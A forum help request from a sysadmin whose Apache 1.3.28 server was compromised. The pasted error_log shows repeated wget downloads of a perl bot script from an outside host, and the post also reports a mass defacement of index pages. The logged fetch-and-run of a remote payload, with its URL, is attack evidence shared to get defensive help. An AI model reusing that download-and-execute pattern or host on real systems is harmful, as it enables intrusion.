Hi,
I'm running an older version of apache 1.3.28 under
a Suse install.
Today I noticed that somehow a bots.txt perl
program is being run, yet it is not run from the filesystem. Somehow this script
is being downloaded and run.
Yesterday the server was also a victim of an attack
from PSYCH@ mass defacement. I don't know if these 2 attacks are related in any
way, but I certainly need help to figure out what to do!
Does anyone know anything related to running this
bots.txt? Here's what I have in my error_log:
--11:51:13-- http://tehboob.be/bots.txt
=> `bots.txt' Resolving tehboob.be... done. Connecting to tehboob.be[72.20.8.243]:80... connected. HTTP request sent, awaiting response... 200 OK Length: 29,378 [text/plain] 0K .......... .......... ........ 100% 683.08 KB/s 11:51:13 (683.08 KB/s) - `bots.txt' saved [29378/29378] --12:15:55-- http://tehboob.be/bots.txt => `bots.txt' Resolving tehboob.be... done. Connecting to tehboob.be[72.20.8.243]:80... connected. HTTP request sent, awaiting response... 200 OK Length: 29,378 [text/plain] 0K .......... .......... ........ 100% 683.08 KB/s 12:15:55 (683.08 KB/s) - `bots.txt' saved [29378/29378] --12:22:25-- http://tehboob.be/bots.txt => `bots.txt' Resolving tehboob.be... done. Connecting to tehboob.be[72.20.8.243]:80... connected. HTTP request sent, awaiting response... 200 OK Length: 29,378 [text/plain] 0K .......... .......... ........ 100% 652.03 KB/s 12:22:25 (652.03 KB/s) - `bots.txt' saved [29378/29378] --12:44:05-- http://tehboob.be/bots.txt => `bots.txt' Resolving tehboob.be... done. Connecting to tehboob.be[72.20.8.243]:80... connected. HTTP request sent, awaiting response... 200 OK Length: 29,378 [text/plain] 0K .......... .......... ........ 100% 652.03 KB/s I have blocked traffic to prevent retrieving this
script from tehboob.be, but that is only a temporary work-around. How is this
program being run? This is the top level error_log and I don't understand how a
perl program is being downloaded and then run.
As far as the mass defacement "By PSYch@
AYYILDIZ-TIM" anyone know anything about that? Basically all of the index.html,
index.htm, index.php (in all sites) were replaced.
One thing I was able to tell via lsof is that the
program running bots.txt was accessing all of the /var/log/httpd/* logs, so I'm
guessing that they were collecting website information?
PLEASE HELP...
Thanks
Ricardo
|